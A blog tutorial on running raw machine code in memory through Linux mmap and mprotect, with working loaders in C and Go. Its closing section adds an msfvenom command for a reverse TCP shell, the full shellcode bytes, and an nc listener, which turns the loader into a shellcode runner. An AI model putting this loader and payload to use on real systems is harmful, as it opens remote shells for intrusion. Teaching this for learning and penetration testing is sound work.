Playing with MMap
Intro to mmap
mmap is a really awesome Linux system call for creating memory maps; basically a virtual buffer
inside the address space of the calling process. It’s similar to VirtualAlloc on Windows and serves
a similar purpose. It allows for a way to “map” files or devices into the current address space thereby
treating a file or device as if it were inside RAM. This then bypasses the buffering and overhead
that normal I/O operations would incur since the data would be available readily by being accessed in
memory instead.
With a memory mapped file, file reading could be done as easily as shifting a pointer through memory
and looking at the content; no need for explicit read() and write() calls. It’s also possible to
create executable areas of memory, and then jump into the memory and run it as a part of the program.
What’s super fascinating about this is that you can create programs that write other programs to
memory and run them in-process. For example, you could write a compiler for your own language, and
instead of compiling out an executable, just write the compiled bytes to a memory mapped file, and
execute it in memory. This is the concept behind Just-In-Time (JIT) compilation.
Using mmap from C
C is an incredibly powerful language and it allows you to cast pointers to functions without complaint. Types are C’s way to pretend it has friendly developer ergonomics, meanwhile flexing it’s nonchalant attitude that bytes are just bytes and mean whatever the fuck you want them to mean.
There is not a lot to the mmap API and we’re going to be calling it like this:
void *mem =
mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);
What we’re asking for here, according to the doco https://man7.org/linux/man-pages/man2/mmap.2.html is
for the Linux kernel to find whatever spot it can of size size and mark it writeable, readable,
private and anonymous…
- By passing
NULLin the address, the kernel makes the decision of where to create the map. Otherwise, we’d have to be aware of our own address space, and know what pointer we want to provide for where to create the map. In our case, I don’t care and kernel knows best. sizeis the size in bytes, and I’ll show you where that comes from shortly.PROT_WRITEandPROT_READare just protection flags and this is what I pass as default since I know I want to both write and read from the map.MAP_PRIVATEandMAP_ANONare beacuse it should be invisible to other processes (opposite ofMAP_SHAREDfor example), and I want it to be anonymous, meaning it’s not actually backed by anything on disk.- Since we passed the
MAP_ANONflag, we then pass-1as the file descriptor since there is no backing file. - We pass
0for the offset, since there is no offset and no backing file to offset into anyway.
Once we have a pointer to our memory mapped in-memory file, we just call memcpy to get our data into
it. However, even if we cast it to a function now, we can’t actually call it. Calling it would require
the instruction pointer landing in the memory to start executing and the kernel will never allow
this unless the area is marked as executable. So we need another Linux syscall called mprotect for
this which is just short for memory protect. It does the same thing to the memory pointed at, as what
mmap does to it with the protection flags. mprotect has doco at https://man7.org/linux/man-pages/man2/mprotect.2.html
int res = mprotect(mem, size, PROT_EXEC | PROT_READ);
This time we are asking for the same memory to be re-protected as executable and readable. Most systems
will require executable memory to also be readable and that makes sense. res will hold the return
code which should be 0 if everything went well.
So now that we have a way of creating an executable bit of memory, we need to be able to actually execute it.
In C, this is straightforward. We create a type of function, then cast the pointer we have to be an
instance of that function, then call it:
// Firstly, create the defintion, called Func, because naming is hard
typedef int (*Func)();
// Cast the pointer to our Func
Func func = (Func)mem;
// Then call it
func();
Now, the reason I created Func as a function that returns an int is because of the code I was
trying to run in memory. Using FASM, I created the bytes I care about (code.asm):
use64
format binary
mov rax, 69
ret
And then compiled it with fasm code.asm. cat code.bin | xxd -p gives the raw bytes to populate
in the calling C code. This FASM code simply puts 69 in the rax register, which is used as the
return value register, and then called ret which is exactly equivalent to C’s return and it pops
the address off the call stack to return to the C code firing point. Since the assembly returns an
integer, the C equivalent function we are casting to must expect and integer return.
The full working code in C is:
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
typedef int (*Func)();
int main() {
uint8_t code[] = {0x48, 0xc7, 0xc0, 0x45, 0x00, 0x00, 0x00, 0xc3};
size_t size = sizeof(code) / sizeof(code[0]);
void *mem =
mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);
if (NULL == mem) {
printf("Failed to map memory\n");
return 1;
}
memcpy(mem, code, size);
int res = mprotect(mem, size, PROT_EXEC | PROT_READ);
if (res != 0) {
printf("Failed to make memory executable!\n");
return 2;
}
Func func = (Func)mem;
return func();
}
And it is compilable and runnable as this:
gcc -o test -lc test.c && ./test; echo $?
69
This gives us the expected return code of 69. Pretty straight forward.
If you’re like me, then this seems pretty cool, but you may not want to do this in C even though this specifically is easy. The rest of C often offers more pain than value. Let’s do it in Golang instead!
Using mmap from Golang
Golang makes this process a bit harder. You can definitely use mmap and mprotect easily enough
since the unix libraries exist and they map almost 1:1 to the actual syscalls. They’re the easy
part:
// mmap call
mem, err := unix.Mmap(-1, 0, len(code), unix.PROT_WRITE|unix.PROT_READ, unix.MAP_PRIVATE|unix.MAP_ANON)
// mprotect call
err := unix.Mprotect(mem, unix.PROT_READ|unix.PROT_EXEC)
The order of arguments has changed slightly for mmap and the file descriptor and offsets come first,
and mprotect no longer needs the size, just the slice reference.
However, Golang does not match the same calling convention as C. https://go.dev/src/cmd/compile/abi-internal Notice the complicated rules for how calling works in Golang? It actually makes a lot of sense and there is nothing bad at all in the way Golang does this; it’s perfect for Golang, but means there is some difficulty with simply calling raw bytes as a function. We now have a multi-step process to go from bytes to function in Golang.
Firstly, when you call mmap in Golang, the result, even though it’s a []byte is not just an
area of memory that is an array of bytes like in C. It’s a Golang slice. This is a Golang construct
that manages it’s own length and capacity since it is effectively a dynamic array. So the []byte
you get back is a slice, and not a pointer to an area of memory. However, the actual pointer is there
and we can get it by unwrapping an unsafe pointer to the slice, as a slice struct of equivalent
shape to the actual Golang slice, then cast the internal data pointer to a function. So we build
these two structures first to be our representation of Golang’s internal function and slices:
type fn struct {
ptr uintptr
}
type slice struct {
Data uintptr
Len int
Cap int
}
So when we have a Golang slice, we now have to effectively unmarshall it as our slice representation,
extract the pointer to it’s data and use it to construct our representation of a function, fn, then
cast it to a higher level Golang func:
s := (*slice)(unsafe.Pointer(&mem))
f := &fn{ptr: s.Data}
execFn := *(*func() int)(unsafe.Pointer(&f))
I think this is truly fascinating because you have to understand how Golang is actually representing
slices and functions otherwise the conversion would be impossible.
We can now run the function we’ve created by calling execFn(). For this demo, I’m using the same
FASM generated assembly as before:
package main
import (
"fmt"
"os"
"unsafe"
"golang.org/x/sys/unix"
)
type fn struct {
ptr uintptr
}
type slice struct {
Data uintptr
Len int
Cap int
}
func main() {
code := []byte{0x48, 0xc7, 0xc0, 0x45, 0x00, 0x00, 0x00, 0xc3}
mem, err := unix.Mmap(-1, 0, len(code), unix.PROT_WRITE|unix.PROT_READ, unix.MAP_PRIVATE|unix.MAP_ANON)
if err != nil {
fmt.Println(err)
os.Exit(1)
}
n := copy(mem, code)
if n != len(code) {
fmt.Println("Failed to copy entire code into mmap")
os.Exit(2)
}
if err := unix.Mprotect(mem, unix.PROT_READ|unix.PROT_EXEC); err != nil {
fmt.Println(err)
os.Exit(3)
}
s := (*slice)(unsafe.Pointer(&mem))
f := &fn{ptr: s.Data}
execFn := *(*func() int)(unsafe.Pointer(&f))
os.Exit(execFn())
}
You will need to go get "golang.org/x/sys/unix" to make sure you have the required unix package
first, otherwise, Mmap and Mprotect won’t be available to you. Finally, run the code:
go run main.go
exit status 69
We have got our exit code as expected.
Next steps
This can be extended to other uses, especially in penetration testing for example. It’s trivial to
generate a reverse shell in msfvenom and get the raw bytes and use this instead for a more interesting
example.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -b "\x00" --encoder none 2>/dev/null | xxd -p -c 0 | sed 's/../0x&,/g; s/,$//'
This will give a payload of:
0x6a,0x29,0x58,0x99,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x0f,0x05,0x48,0x97,0x48,0xb9,0x02,0x00,0x11,0x5c,0x7f,0x00,0x00,0x01,0x51,0x48,0x89,0xe6,0x6a,0x10,0x5a,0x6a,0x2a,0x58,0x0f,0x05,0x6a,0x03,0x5e,0x48,0xff,0xce,0x6a,0x21,0x58,0x0f,0x05,0x75,0xf6,0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x52,0x57,0x48,0x89,0xe6,0x0f,0x05
We can catch the reverse shell using nc -lnvp 4444 in one terminal, and run go run main.go in another.